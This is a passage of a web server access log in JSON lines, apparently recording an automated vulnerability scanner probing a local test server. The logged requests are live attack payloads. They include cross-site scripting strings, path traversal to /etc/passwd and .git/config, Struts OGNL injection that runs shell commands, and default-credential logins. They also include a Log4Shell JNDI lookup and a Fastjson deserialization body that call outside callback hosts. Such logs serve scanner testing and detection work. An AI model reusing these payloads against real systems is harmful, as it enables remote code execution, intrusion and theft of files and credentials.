(KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tour-list/?keywords=%3Cinput%2FAutofocus%2F%250D*%2FOnfocus%3Dalert%28123%29%3B%3E&start_date=xxxxxxxxxxxx&avaibility=13 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apis/apps/v1/namespaces/default/deployments HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sqlitedb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui/jobs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /configurations HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"page=login_change&oper=0&username=admin&password=conel&submit=Login","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sitecore/admin/login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /elfinder.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=dompdf.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.servlet.json?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/info HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"aws.interact.sh","request":"GET http://aws.interact.sh/opc/v1/instance HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.067","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/servlet/svnwebclient/changedResource.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /prweb/PRAuth/app/default/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/pkg?command= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"_IWP_JSON_PREFIX_eyJpd3BfYWN0aW9uIjoiYWRkX3NpdGUiLCJwYXJhbXMiOnsidXNlcm5hbWUiOiJ7e3VzZXJuYW1lfX0ifX0=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/MBeanServerId HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /threaddump HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.7z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/Attitude/go.php?https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.json?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_fragment?_path=_controller=phpcredits&flag=-1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lib/dompdf/dompdf.php?input_file=dompdf.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /filter/jmol/js/jsmol/php/jsmol.php?call=getRawDataFromDatabase&query=file:///etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static../.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /osm/REGISTER.cmd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/servlet/svnwebclient/commitGraph.jsp?%27)%3Balert(%22XSS HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /c42api/v3/LoginConfiguration?username=${jndi:ldap://${hostName}.ca2u0eosmpv1jhs80ca0g8yqqmco58pid.oast.fun/test}&url=https://localhost HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /OA_HTML/jtfLOVInProcess.jsp%3FAAA%3DAAAAAAAAAA%27%22%3E%3Csvg%2Fonload%3Dalert('29N5mCyJBzeGKiL1K6pTQLZWOop')%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationName HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"username=admin&password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /carbon/admin/login_action.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=feedwordpress%2Fsyndication.php&visibility=%22%3E%3Cimg+src%3D2+onerror%3Dalert%28document.domain%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.sql.bz2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.085","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.079","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/threaddump HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.091","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /includes/dompdf/dompdf.php?input_file=dompdf.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /translations/en.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.json///a.1.json?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"4286","req_time":"0.077","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=bwg_frontend_data&shortcode_id=1\x22%20onmouseover=alert(document.domain)// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /js../.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /osm_tiles/REGISTER.cmd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.063","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_weberpcustomer&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.063","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /OA_HTML/oksAutoRenewalHelp.jsp%3Fthanks%3D%27%22%3E%3Csvg%2Fonload%3Dalert('29N5mCyJBzeGKiL1K6pTQLZWOop')%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/servlet/svnwebclient/commitGraph.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.063","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"{\x0D\x0A \x22@type\x22:\x22LL\x5Cu0063\x5Cu006f\x5Cu006d.sun.rowset.JdbcRowSetImpl;;\x22,\x0D\x0A \x22dataSourceName\x22:\x22rmi://ca2u0eosmpv1jhs80ca0gp8hhogkqp84h.oast.fun/Exploit\x22,\x0D\x0A \x22autoCommit\x22:true\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.081","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVendor HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:14:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/3 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) 